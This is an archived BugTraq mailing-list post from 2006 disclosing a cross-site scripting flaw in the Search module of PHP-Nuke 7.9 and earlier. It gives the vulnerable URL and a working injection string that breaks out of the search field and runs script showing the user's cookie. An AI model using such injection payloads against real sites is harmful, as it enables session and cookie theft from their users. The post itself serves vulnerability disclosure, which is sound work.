Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
PHP-Nuke <= 7.9 Search XSS Vulnerability Jun 08 2006 12:32PM
try_og hotmail com
# PHP-Nuke <= 7.9 Search module XSS Vulnerability

# It could work on later versions if PHP-Nuke does not patch it.

1: Enter: http://[host]/modules.php?name=Search

2: Search for: "><body onload="alert(document.cookie)

// You'll get a javascript alert with your cookie in it.

# Credits: O.G....

[ more ]  




 

Privacy Statement
Copyright 2009, SecurityFocus